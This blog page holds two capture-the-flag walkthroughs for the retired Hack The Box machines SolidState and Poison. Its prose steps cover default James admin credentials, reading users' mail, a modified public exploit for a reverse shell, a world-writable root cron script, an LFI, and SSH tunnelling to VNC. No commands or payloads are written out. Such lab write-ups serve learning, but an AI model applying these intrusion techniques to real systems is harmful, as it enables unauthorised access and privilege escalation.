AdSense
Tuesday, February 5, 2019
SolidState
SOLIDSTATE
- Layout for this exercise:
1 - INTRODUCTION
- The goal of this exercise is to develop a hacking process for the vulnerable machine SolidState, what is a retired machine from the Hack The Box pentesting platform:
https://www.hackthebox.eu
2 - ENUMERATION
- SolidState's IP is 10.10.10.51:
- Scanning all ports with Nmap there are 6 open ports:
- Connecting with the browser:
- Scanning deeply those 6 open ports:
- So the James Remote Admin 2.3.2 application is running on port 4555, what is vulnerable to this exploit:
https://www.exploit-db.com/exploits/35513
- Reading the content we discover default credentials root:root :
3 - EXPLOITATION
- The connection to port 4555 using credentials root:root is successful:
- HELP lists available commands:
- Listing users:
- Resetting passwords:
- Now, using these new passwords let's connect to the POP3 service running on port 110:
- users james, thomas and mailadmin don't have messages to be retrieved:
- user john has and interesting message from james, where they talk about user mindy's credentials:
- However, the most interesting task is to retrieve user mindy's two messages:
- At the second message we can read the password P@55W0rd1!2@
- Using this password to try an SSH connection for mindy:
4 - READING THE 1st FLAG
- Reading user.txt:
5 - PRIVILEGE ESCALATION
- However this shell is no very powerful because a lot of essential commands are restricted:
- To start a Privilege Escalation process let's copy locally the script of the 35513 exploit, where the payload can be modified according to our own interest:
- Giving execution permissions:
- Setting a Netcat listening session after the modified payload:
- Running 35513.py against SolidState's IP:
- So to get the payload executed we need that somebody logs in, for instance user mindy:
- As a consequence there is a reverse shell that can be improved successfully:
- This shell allows more commands than the previous one:
- At this point let's look for any process being run by users either mindy, james, ...:
- It seems that a process inside folder /opt is being run with root privileges, and going there we discover that tmp.py is owned by root and sldo it is world writable:
- Reading tmp.py:
- Modifying tmp.py so that a shell is remotely spawn:
- After 3 minutes a root shell is spwan:
- Checking that tmp.py is scheduled as a crontab job every 3 minutes:
6 - CAPTURING THE 2nd FLAG
- Reading root.txt:
Sunday, February 3, 2019
Poison
POISON
- Layout for this exercise:
1 - INTRODUCTION
- The goal of this exercise is to develop a hacking process for the vulnerable machine Poison, what is a retired machine from the Hack The Box pentesting platform:
https://www.hackthebox.eu
2 - ENUMERATION
- Poison's IP is 10.10.10.84:
- Scanning with Nmap it seems there are just 2 open ports and the Operating System is FreeBSD:
- Going deeper with ports SSH 22 and HTTP 80:
- Connecting with the browser we find a local .php scripts test application:
- Checking ini.php:
- info.php:
- phpinfo.php:
- listfiles.php lets us know that there is a promising text file called pwdbackup.txt:
- By the way, before going ahead, we detect the presence of an LFI vulnerability, though this will not be our vector attack:
- Anyway from /etc/passwd we learn the existence of a user called charix.
- Reading pwdbackup.txt we find a 13 times base64 encrypted password:
- Copying it locally to the attacking machine:
- Now, applying by 13 times the base64 decoding process we find a password:
https://codebeautify.org/base64-decode
3 - EXPLOITATION
- This password allows an SSH connection for user charix:
4 - CAPTURING THE 1st FLAG
- Reading user.txt:
5 - PRIVILEGE ESCALATION
- Aside from user.txt there is a secret.zip that we try to unzip unsuccessfully:
- A file secret is created, but it is empty and useless so it's probably a good idea to remove it:
- Let's move secret.zip to Kali:
- Unzipping secret.zip with the password found before:
- Now it seems that the file secret could be a valid password, it's not empty at least:
- Let's transfer it from Kali to Poison, so that it will be used later:
- At this point of the exploitation sockstat (FreeBSD command) lists all open sockets (option -4 for IPv4):
https://www.freebsd.org/cgi/man.cgi?query=sockstat&sektion=1&manpath=freebsd-release-ports
- Poison is listening locally at ports 5801 and 5901 for a VNC (Virtual Network Computing) connection:
- However both ports seem closed externally, so we cannot access directly to them from Kali:
- The solution would be to use SSH Tunneling, what is explained thoroughly here:
https://www.hackingarticles.in/comprehensive-guide-on-ssh-tunneling/
- vncviewer is the client for the remote VNC virtual desktop connection:
6 - CAPTURING THE 2nd FLAG
- Reading root.txt:
- Also, root.txt can be transferred to Kali with Netcat:
- Netstat lists active connections for Poison:
Subscribe to:
Posts (Atom)